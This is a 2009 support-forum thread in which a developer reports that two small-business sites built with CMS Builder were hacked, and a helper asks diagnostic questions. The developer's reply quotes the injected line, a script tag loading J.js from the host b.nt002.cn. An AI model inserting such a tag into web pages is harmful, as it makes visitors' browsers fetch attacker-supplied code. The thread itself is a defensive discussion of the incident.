Website hack

4 posts by 3 authors in: Forums > CMS Builder
Last Post: October 5, 2009   (RSS)

By cnorthey - October 3, 2009

I have had a couple of sites that use CMS builder come under attack from hackers. It seems that malicious javascript has been added to my PHP files. I have been in contact with the two different hosts for these sites and they both claim it's most likely the CMS that is causing the vulnerability.

The CMS hadn't been updated in about 6 months and I'm wondering in that time if major security updates had been added. Both clients are actually now considering using another CMS package and I'm reluctant to use this program for future clients unless I'm certain CMS builder wasn't the problem or can ensure this won't happen in the future.

Re: [cnorthey] Website hack

By Kenny - October 3, 2009

Here's couple of questions that may help determine what the core problem is.

1. Exactly what files were written to by the hackers? (Most Important)

2. What version of CMS are you using?

3. What did the javascript intend to do and was it successful?


Everything (and I mean EVERYTHING) is hack-able. More important is at what point and why would someone hack your website. As a developer, when you find a hole, you patch it. There is so much more to say and speculate about this, but we really need the answers to the above questions in order speak definitively about the problem.

Please let us know.


Kenny

Re: [sagentic] Website hack

By cnorthey - October 4, 2009

Hi Kenny, thanks for your quick reply.

To answer your questions:

1. The files that have been identified as being hacked are PHP files. For both sites the index.php file has been affected, and one of the sites has a couple of other PHP files in the root directory that have been edited.

2. I have tried to login to the CMS to obtain the version number, however my client has changed the password for this and the FTP for security reasons and hasn't supplied the new details yet. It was downloaded in February so whatever the latest version was then is what's installed.

3. The line of code put into the PHP was quite simple and calls - <script src=''http"//b.nt002.cn/E/J.js></script>. All browsers have alerted that this site poses a security risk and therefore hasn't affected my computer or others as far as I'm aware. It does however mean that the sites are not accessible at present.

One of the sites is a completely Flash driven site, and all the CMS does is provide a front end for the client to enter the data. I then have written a script that converts the database info into XML so that it can be read by Flash. There is no code that actually feeds data into the PHP page for this site. The other site affected however displays database inforamtion using CMS builder functions.

These are both websites for small business and there is no reason why someone would specifically hack them. I think it's something that's automated that's found a loophole in both sites.

I have tested 3 other website I have created that use CMS builder and all have older versions of the CMS (which will soon be updated) and they are fine so far.

The things that the affected sites have in common are:

- Use CMS builder of course
- Have Flash elements in the index.php file
- Have been updated by myself and my client (who does basic site management only such as uploading via FTP and updating via CMS builder).

Thanks for your help and I hope this information can narrow down what the problem is.